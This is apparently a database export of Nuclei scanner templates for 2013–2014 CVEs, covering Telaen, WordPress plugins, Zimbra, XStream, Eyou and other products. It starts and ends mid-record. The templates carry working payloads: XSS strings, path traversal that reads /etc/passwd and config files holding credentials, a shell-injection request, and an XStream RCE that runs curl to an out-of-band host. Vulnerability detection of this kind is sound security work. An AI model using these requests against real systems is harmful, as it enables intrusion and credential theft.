exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to the latest version of Telaen to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/38546\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2621\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2013-2621\n cwe-id: CWE-601\n epss-score: 0.03563\n epss-percentile: 0.90674\n cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: telaen_project\n product: telaen\n tags: cve2013,cve,telaen,redirect,telaen_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/telaen/redir.php?https://interact.sh\"\n - \"{{BaseURL}}/redir.php?https://interact.sh\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022047d42b34a035b4f67b78f16f771a7b48591281e968fc8d1650ad9b7808049305022100e564b5514038061f581a413e252920c2f837099327c21c6c6dda604704f18731:922c64590222798bb761d5b6d8e72950", "hash": "a2703a8c453821c13096b5fa9bd7b06d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f03" }, "name": "CVE-2013-3526.yaml", "content": "id: CVE-2013-3526\n\ninfo:\n name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by 
users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-3526\n - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-3526\n cwe-id: CWE-79\n epss-score: 0.00519\n epss-percentile: 0.74326\n cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wptrafficanalyzer\n product: trafficanalyzer\n google-query: inurl:\"/wp-content/plugins/trafficanalyzer\"\n tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'traffic analy'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950", "hash": "cace11599faceb07fbd915da2e8ea10c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f04" }, "name": "CVE-2013-3827.yaml", "content": "id: CVE-2013-3827\n\ninfo:\n name: Javafaces LFI\n author: Random-Robbie\n severity: medium\n description: An Unspecified 
vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.\n remediation: |\n Apply the latest patches and updates for the affected software to fix the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-3827\n - https://www.exploit-db.com/exploits/38802\n - https://www.oracle.com/security-alerts/cpuoct2013.html\n - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n - http://rhn.redhat.com/errata/RHSA-2014-0029.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-3827\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.64598\n epss-percentile: 0.97602\n cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 10\n vendor: oracle\n product: fusion_middleware\n tags: cve,cve2013,edb,lfi,javafaces,oracle\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - 
\"{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022004ed49f715d733cebf8e45978d9acd3aca08a4092675323e59ef366cbae1bb33022100b9ecd10a07a9c0837cf0fbdc16fe4ddc9b65e3efccfe0b6fb2dc3f64fee938c0:922c64590222798bb761d5b6d8e72950", "hash": "0f4901671bfa04ef215cc7d330cbe727", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f05" }, "name": "CVE-2013-4117.yaml", "content": "id: CVE-2013-4117\n\ninfo:\n name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-4117\n - http://openwall.com/lists/oss-security/2013/07/11/11\n - http://seclists.org/bugtraq/2013/Jul/17\n - http://exploit.iedb.ir/exploits-177.html\n - http://packetstormsecurity.com/files/122259/WordPress-Category-Grid-View-Gallery-XSS.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-4117\n cwe-id: CWE-79\n epss-score: 0.01217\n epss-percentile: 0.83801\n cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: anshul_sharma\n 
product: category-grid-view-gallery\n google-query: inurl:\"/wp-content/plugins/category-grid-view-gallery\"\n tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Category Grid View Gallery ='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950", "hash": "5c36958798f405d78bd86ae5767810eb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f06" }, "name": "CVE-2013-4625.yaml", "content": "id: CVE-2013-4625\n\ninfo:\n name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to Duplicator 0.4.5 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-4625\n - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html\n - 
https://seclists.org/bugtraq/2013/Jul/160\n - https://www.htbridge.com/advisory/HTB23162\n - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-4625\n cwe-id: CWE-79\n epss-score: 0.01217\n epss-percentile: 0.85008\n cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cory_lamle\n product: duplicator\n google-query: inurl:\"/wp-content/plugins/duplicator\"\n tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Duplicator - WordPress Migration'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950", "hash": "b1d54e61fad853f4e7d442dba051603b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f07" }, "name": "CVE-2013-5528.yaml", "content": "id: CVE-2013-5528\n\ninfo:\n name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka 
Bug ID CSCui78815\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/40887\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3120\n - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2013-5528\n cwe-id: CWE-22\n epss-score: 0.00534\n epss-percentile: 0.74722\n cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_communications_manager\n tags: cve2013,cve,lfi,cisco,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205aea6a3329c1b3729df1a92cdd65029eb715ca60be7942d50b43c534886443ec02207e979dcaeedb3adc3b95a9be530f5446fffa7fb00644d1f33ad2f93559634fc6:922c64590222798bb761d5b6d8e72950", "hash": "7dabb8844cf06a9bc570202822d92210", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f08" }, "name": "CVE-2013-5979.yaml", "content": "id: CVE-2013-5979\n\ninfo:\n name: Xibo 1.2.2/1.4.1 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. 
(dot dot) in the p parameter to index.php.\n impact: |\n An attacker can read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Xibo.\n reference:\n - https://www.exploit-db.com/exploits/26955\n - https://nvd.nist.gov/vuln/detail/CVE-2013-5979\n - https://bugs.launchpad.net/xibo/+bug/1093967\n - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00\n - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-%28DS-2013-00\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-5979\n cwe-id: CWE-22\n epss-score: 0.04915\n epss-percentile: 0.92611\n cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: springsignage\n product: xibo\n tags: cve2013,cve,lfi,edb,springsignage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950", "hash": "bd44efe2a1ee4ceed3f5d558be43be78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f09" }, "name": "CVE-2013-6281.yaml", "content": "id: CVE-2013-6281\n\ninfo:\n name: WordPress Spreadsheet - Cross-Site Scripting\n author: random-robbie\n severity: medium\n description: |\n WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential 
data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf\n - https://wordpress.org/plugins/dhtmlxspreadsheet/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281\n - https://nvd.nist.gov/vuln/detail/CVE-2013-6281\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-6281\n cwe-id: CWE-79\n epss-score: 0.00327\n epss-percentile: 0.70301\n cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dhtmlx\n product: dhtmlxspreadsheet\n framework: wordpress\n google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet\n tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"page: ''\"\n - \"dhx_rel_path\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950", "hash": "9f25a9700c85996ec7fc2dc5b646166e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0a" }, "name": "CVE-2013-7091.yaml", "content": "id: CVE-2013-7091\n\ninfo:\n name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion\n author: rubina119\n severity: medium\n description: A directory traversal vulnerability in 
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-7091\n - https://www.exploit-db.com/exploits/30085\n - https://www.exploit-db.com/exploits/30472\n - http://www.exploit-db.com/exploits/30085\n - http://packetstormsecurity.com/files/124321\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-7091\n cwe-id: CWE-22\n epss-score: 0.97337\n epss-percentile: 0.99881\n cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00\"\n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n words:\n - \"zimbra_server_hostname\"\n - \"zimbra_ldap_userdn\"\n - \"zimbra_ldap_password\"\n - \"ldap_postfix_password\"\n - \"ldap_amavis_password\"\n - \"ldap_nginx_password\"\n - \"mysql_root_password\"\n condition: or\n\n - type: regex\n regex:\n 
- \"root=.*:0:0\"\n# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950", "hash": "18412de5f07ae6481e4dae3c44182818", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0b" }, "name": "CVE-2013-7240.yaml", "content": "id: CVE-2013-7240\n\ninfo:\n name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used.\n reference:\n - https://www.exploit-db.com/exploits/38936\n - https://nvd.nist.gov/vuln/detail/CVE-2013-7240\n - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/\n - http://seclists.org/oss-sec/2013/q4/570\n - http://seclists.org/oss-sec/2013/q4/566\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-7240\n cwe-id: CWE-22\n epss-score: 0.21533\n epss-percentile: 0.96023\n cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: westerndeal\n product: advanced_dewplayer\n google-query: inurl:\"/wp-content/plugins/advanced-dewplayer/\"\n tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: 
body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n - \"DB_HOST\"\n - \"The base configurations of the WordPress\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950", "hash": "415a48080d14787a14668be68c8cba27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0c" }, "name": "CVE-2013-7285.yaml", "content": "id: CVE-2013-7285\n\ninfo:\n name: XStream <1.4.6/1.4.10 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: critical\n description: |\n Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.\n reference:\n - https://x-stream.github.io/CVE-2013-7285.html\n - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html\n - https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html\n - https://nvd.nist.gov/vuln/detail/cve-2013-7285\n - https://blog.csdn.net/Xxy605/article/details/126297121\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2013-7285\n cwe-id: CWE-78\n epss-score: 0.55716\n epss-percentile: 0.97607\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: 
cve2013,cve,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n foo\n \n java.lang.Comparable\n \n \n \n curl\n http://{{interactsh-url}}\n \n \n start\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950", "hash": "a918a65d2fed32fe463285456a4b6c4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0d" }, "name": "CVE-2014-10037.yaml", "content": "id: CVE-2014-10037\n\ninfo:\n name: DomPHP 0.83 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. 
(dot dot) in the url parameter to photoalbum/index.php.\n impact: |\n An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/30865\n - https://nvd.nist.gov/vuln/detail/CVE-2014-10037\n - http://www.exploit-db.com/exploits/30865\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-10037\n cwe-id: CWE-22\n epss-score: 0.14101\n epss-percentile: 0.95548\n cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: domphp\n product: domphp\n tags: cve2014,cve,lfi,edb,domphp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a89179af6be12060f1fe5577e41d64f1b2826960d0485ad9e47556edc6ce21aa02205a19be61ffd6eb717e6ba7e0e9fe45d7292c97bf00654bebf6691684a9e5aef9:922c64590222798bb761d5b6d8e72950", "hash": "6bd7b54dda0d977d5a761fde93e6e3be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0e" }, "name": "CVE-2014-1203.yaml", "content": "id: CVE-2014-1203\n\ninfo:\n name: Eyou E-Mail <3.6 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.\n impact: |\n Successful exploitation of this vulnerability could 
allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Eyou E-Mail to version 3.6 or later, or apply the necessary security patches.\n reference:\n - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g\n - https://nvd.nist.gov/vuln/detail/CVE-2014-1203\n - http://seclists.org/fulldisclosure/2014/Jan/32\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-1203\n cwe-id: CWE-77\n epss-score: 0.02045\n epss-percentile: 0.88732\n cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyou\n product: eyou\n tags: cve2014,cve,seclists,rce,eyou\n\nhttp:\n - raw:\n - |\n POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n type='|cat /etc/passwd||'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950", "hash": "d01e38f13de7ca98aebca1a7aaf99380", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0f" }, "name": "CVE-2014-2321.yaml", "content": "id: CVE-2014-2321\n\ninfo:\n name: ZTE Cable Modem Web Shell\n author: geeknik\n severity: critical\n description: |\n ZTE F460 and F660 cable modems allow remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest firmware update provided by ZTE to fix the vulnerability\n reference:\n - 
